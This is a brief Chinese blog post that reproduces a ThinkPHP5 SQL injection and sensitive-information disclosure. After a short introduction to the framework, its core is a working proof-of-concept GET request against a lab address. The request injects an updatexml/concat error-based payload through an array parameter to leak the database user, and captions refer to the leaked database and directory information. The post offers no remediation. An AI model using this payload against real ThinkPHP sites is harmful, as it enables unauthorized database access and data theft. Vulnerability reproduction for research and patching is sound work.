Please enable Javascript to view the contents

ThinkPHP5 SQL注入漏洞 and 敏感信息泄露 复现 Poc

 ·  ☕ 1 分钟  ·  ✍️ IceKam · 👀... 阅读

介绍

ThinkPHP是一个快速、兼容而且简单的轻量级国产PHP开发框架,诞生于2006年初,原名FCS,2007年元旦正式更名为ThinkPHP,遵循Apache2开源协议发布,从Struts结构移植过来并做了改进和完善,同时也借鉴了国外很多优秀的框架和模式,使用面向对象的开发结构和MVC模式,融合了Struts的思想和TagLib(标签库)、RoR的ORM映射和ActiveRecord模式。

Poc

get

http://172.20.0.3/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1

数据库信息

ThinkPHP5 SQL注入漏洞 and 敏感信息泄露 复现 Poc ThinkPHP5数据库

目录信息

ThinkPHP5 SQL注入漏洞 and 敏感信息泄露 复现 Poc ThinkPHP5目录文件信息泄露

总结

这个洞比较恶心。

分享
您的鼓励是我最大的动力
bitcoin QR Code

icekam
作者
IceKam
茶艺品鉴砖家,低端码字人口。